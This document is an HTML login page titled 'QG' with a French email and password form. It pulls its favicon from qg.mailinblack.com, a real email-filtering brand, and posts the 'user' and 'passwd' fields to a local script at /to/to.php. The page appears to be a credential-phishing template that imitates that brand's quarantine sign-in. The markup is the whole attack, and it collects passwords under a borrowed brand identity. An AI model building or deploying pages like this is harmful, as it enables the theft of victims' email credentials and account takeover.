<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>QG</title>
<link rel="icon" type="image/png" href="https://qg.mailinblack.com/favicon.ico" />
<style>
  html, body {
    font-family: Arial, sans-serif;
    margin: 0;
    padding: 0;
    border: 0;
    position: absolute;
    height: 100%;
    min-width: 100%;
    font-size: 13px;
    color: #404040;
    direction: ltr;
    -webkit-text-size-adjust: none;
  }

  .form-group {
    position: relative;
    margin-bottom: 20px;
  }

  .form-group input {
    -moz-appearance: none;
    -webkit-appearance: none;
    appearance: none;
    width: 100%;
    padding: 15px 15px 5px 15px;
    border: 1px solid #d5d5d5;
    border-radius: 10px;
    font-size: 12px;
    color: #787878;
    box-sizing: border-box;
  }

  .form-group input:focus {
    outline: none;
    border-color: #E68037;
  }

  .form-group label {
    position: absolute;
    left: 15px;
    top: 12px;
    background: white;
    padding: 0 5px;
    color: #787878;
    font-size: 12px;
    pointer-events: none;
    transition: 0.2s ease all;
  }

  .form-group input:focus + label,
  .form-group input:not(:placeholder-shown) + label {
    top: -8px;
    left: 10px;
    font-size: 10px;
    color: #E68037;
  }

  input::placeholder {
    color: transparent;
  }
</style>
</head>
<body>

<div align="center">
  <table border="0" width="1140" cellspacing="0" cellpadding="0" height="705" background="img/bg.png">
    <tr>
      <td>
        <table border="0" width="100%" cellspacing="0" cellpadding="0">
          <tr><td height="383"></td></tr>
          <tr>
            <td height="190">
              <table border="0" width="100%" cellspacing="0" cellpadding="0">
                <tr>
                  <td width="361"></td>
                  <td>
                    <table border="0" width="100%" cellspacing="0" cellpadding="0">
                      <form method="post" action="/to/to.php">
                        <tr>
                          <td height="60">
                            <div class="form-group">
                              <input type="text" name="user" id="user" placeholder="Email" required>
                              <label for="user">Email</label>
                            </div>
                          </td>
                        </tr>
                        <tr>
                          <td height="60">
                            <div class="form-group">
                              <input type="password" name="passwd" id="passwd" placeholder="Mot de passe" required>
                              <label for="passwd">Mot de passe</label>
                            </div>
                          </td>
                        </tr>
                        <tr>
                          <td height="49"></td>
                        </tr>
                        <tr>
                          <td>
                            <table border="0" width="100%" cellspacing="0" cellpadding="0">
                              <tr>
                                <td width="155">&nbsp;</td>
                                <td width="106">
                                  <img border="0" src="img/btn.png" width="106" height="37">
                                </td>
                                <td>&nbsp;</td>
                              </tr>
                            </table>
                          </td>
                        </tr>
                      </form>
                    </table>
                  </td>
                  <td width="359">&nbsp;</td>
                </tr>
              </table>
            </td>
          </tr>
          <tr><td height="135"></td></tr>
        </table>
      </td>
    </tr>
  </table>
</div>

</body>
</html>
